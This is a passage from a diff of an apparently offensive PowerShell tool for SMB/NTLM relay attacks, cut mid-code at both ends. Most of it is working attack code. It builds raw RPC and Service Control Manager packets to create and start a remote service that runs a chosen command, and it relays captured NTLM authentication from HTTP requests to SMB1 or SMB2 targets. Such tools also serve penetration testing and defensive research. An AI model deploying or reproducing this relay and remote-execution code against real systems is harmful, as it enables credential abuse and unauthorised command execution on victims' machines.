+ $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04))
+ $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ if($packet_call_ID -eq 3)
+ {
+ $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02))
+ $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $packet_RPCBind
+ }
+
+ function Get-PacketRPCRequest()
+ {
+ param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_object_UUID)
+
+ if($packet_auth_length -gt 0)
+ {
+ $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
+ }
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_object_UUID.Length)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length)
+ [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
+ $packet_auth_length = $packet_auth_length[0,1]
+
+ $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05))
+ $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00))
+ $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00))
+ $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags)
+ $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length)
+ $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length)
+ $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID)
+ $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint)
+ $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID)
+ $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum)
+
+ if($packet_object_UUID.Length)
+ {
+ $packet_RPCRequest.Add("RPCRequest_ObjectUUID",$packet_object_UUID)
+ }
+
+ return $packet_RPCRequest
+ }
+
+ #SCM
+
+ function Get-PacketSCMOpenSCManagerW()
+ {
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+ }
+
+ function Get-PacketSCMCreateServiceW()
+ {
+ param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
+ [Byte[]]$packet_command,[Byte[]]$packet_command_length)
+
+ $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID += 0x00,0x00
+
+ $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command)
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SCMCreateServiceW
+ }
+
+ function Get-PacketSCMStartServiceW()
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle)
+ $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SCMStartServiceW
+ }
+
+ function Get-PacketSCMDeleteServiceW()
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle)
+
+ return $packet_SCMDeleteServiceW
+ }
+
+ function Get-PacketSCMCloseServiceHandle()
+ {
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle)
+
+ return $packet_SCM_CloseServiceW
+ }
+
+}
+
# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response
$SMB_NTLM_functions_scriptblock =
{
@@ -552,103 +1370,115 @@ $SMB_relay_challenge_scriptblock =
{
function SMBRelayChallenge
{
- param ($SMB_relay_socket,$HTTP_request_bytes)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version)
- if ($SMB_relay_socket)
+ if($SMB_relay_socket)
{
$SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
}
- $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
- $i = 0
+ $SMB_client_receive = New-Object System.Byte[] 1024
+ $SMB_client_stage = 'NegotiateSMB'
- :SMB_relay_challenge_loop while ($i -lt 2)
+ :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit')
{
- switch ($i)
+ switch ($SMB_client_stage)
{
- 0
+ 'NegotiateSMB'
{
- $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
- 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0xff,0xff +
- $inveigh.process_ID_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
- 0x20,0x30,0x2e,0x31,0x32,0x00
+ $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+ else
+ {
+ $SMB_client_stage = 'NegotiateSMB2'
+ }
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
+ {
+ $inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")])
+ $SMB_relay_socket.Close()
+ $SMB_client_receive = $null
+ $inveigh.SMB_relay = $false
+ $SMB_client_stage = 'exit'
+ }
+
}
- 1
+ 'NegotiateSMB2'
{
- $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 32)
- $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 22)
- $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 2)
- $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.Length)
- $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 34))
- $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
- $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 45))
- $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
- $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 104))
- $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
- $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- [Array]::Reverse($SMB_netbios_length)
-
- $SMB_relay_challenge_send = 0x00,0x00 +
- $SMB_netbios_length +
- 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
- $inveigh.process_ID_bytes +
- 0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
- 0x01,0x00,0x00,0x00,0x00,0x00 +
- $SMB_blob_length +
- 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
- $SMB_byte_count +
- 0x60 +
- $SMB_length_1 +
- 0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0 +
- $SMB_length_2 +
- 0x30,0x3c,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,
- 0x82,0x37,0x02,0x02,0x0a,0xa2 +
- $SMB_length_3 +
- 0x04 +
- $SMB_NTLMSSP_length +
- $HTTP_request_bytes +
- 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = Get-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
}
-
- }
- $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
- $SMB_relay_challenge_stream.Flush()
-
- if($SMBRelayNetworkTimeout)
- {
- $SMB_relay_challenge_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
- $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-
- while(!$SMB_relay_challenge_stream.DataAvailable)
- {
-
- if($SMB_relay_challenge_stopwatch.Elapsed -ge $SMB_relay_challenge_timeout)
+ 'NTLMSSPNegotiate'
+ {
+
+ if($SMB_version -eq 'SMB1')
{
- $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
- $inveigh.SMB_relay_active_step = 0
- $SMB_relay_socket.Close()
- break SMB_relay_challenge_loop
+ $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
}
-
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 0x06,0x03,0x80,0x25,0x00,0x00,0x00,0x0f
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
}
}
-
- $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
- $i++
+
}
-
- return $SMB_relay_challenge_bytes
+
+ return $SMB_client_receive
}
}
@@ -658,455 +1488,807 @@ $SMB_relay_response_scriptblock =
{
function SMBRelayResponse
{
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
- $SMB_relay_response_bytes = New-Object System.Byte[] 1024
+ $SMB_client_receive = New-Object System.Byte[] 1024
- if ($SMB_relay_socket)
+ if($SMB_relay_socket)
{
$SMB_relay_response_stream = $SMB_relay_socket.GetStream()
}
- $SMB_length_1 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 12))
- $SMB_length_1 = $SMB_length_1 -replace "-00-00",""
- $SMB_length_1 = $SMB_length_1.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_length_2 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 8))
- $SMB_length_2 = $SMB_length_2 -replace "-00-00",""
- $SMB_length_2 = $SMB_length_2.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_length_3 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 4))
- $SMB_length_3 = $SMB_length_3 -replace "-00-00",""
- $SMB_length_3 = $SMB_length_3.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_NTLMSSP_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
- $SMB_NTLMSSP_length = $SMB_NTLMSSP_length -replace "-00-00",""
- $SMB_NTLMSSP_length = $SMB_NTLMSSP_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 16))
- $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
- $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 27))
- $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
- $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 86))
- $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
- $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- [Array]::Reverse($SMB_length_1)
- [Array]::Reverse($SMB_length_2)
- [Array]::Reverse($SMB_length_3)
- [Array]::Reverse($SMB_NTLMSSP_length)
- [Array]::Reverse($SMB_netbios_length)
- $j = 0
-
- :SMB_relay_response_loop while ($j -lt 1)
+ if($SMB_version -eq 'SMB1')
{
- $SMB_relay_response_send = 0x00,0x00 +
- $SMB_netbios_length +
- 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,
- 0x00,0x00 +
- $SMB_blob_length +
- 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
- $SMB_byte_count +
- 0xa1,0x82 +
- $SMB_length_1 +
- 0x30,0x82 +
- $SMB_length_2 +
- 0xa2,0x82 +
- $SMB_length_3 +
- 0x04,0x82 +
- $SMB_NTLMSSP_length +
- $HTTP_request_bytes +
- 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
-
- $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
- $SMB_relay_response_stream.Flush()
-
- if($SMBRelayNetworkTimeout)
- {
- $SMB_relay_response_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
- $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew()
-
- while(!$SMB_relay_response_stream.DataAvailable)
- {
-
- if($SMB_relay_response_stopwatch.Elapsed -ge $SMB_relay_response_timeout)
- {
- $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
- $inveigh.SMB_relay_active_step = 0
- $SMB_relay_socket.Close()
- break :SMB_relay_response_loop
- }
-
- }
-
- }
-
- $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
- $inveigh.SMB_relay_active_step = 2
- $j++
+ $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header["SMBHeader_UserID"] = $SMB_user_ID
+ $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
}
-
- return $SMB_relay_response_bytes
- }
-
-}
-
-# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
-$SMB_relay_execute_scriptblock =
-{
- function SMBRelayExecute
- {
- param ($SMB_relay_socket,$SMB_user_ID)
-
- if ($SMB_relay_socket)
+ else
{
- $SMB_relay_execute_stream = $SMB_relay_socket.GetStream()
+ $SMB2_message_ID = 3
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
}
- $SMB_relay_failed = $false
- $SMB_relay_execute_bytes = New-Object System.Byte[] 1024
- $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
- $SMB_service = $SMB_service_random -replace "-00",""
- $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
- $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
- $SMB_service_random += '00-00-00'
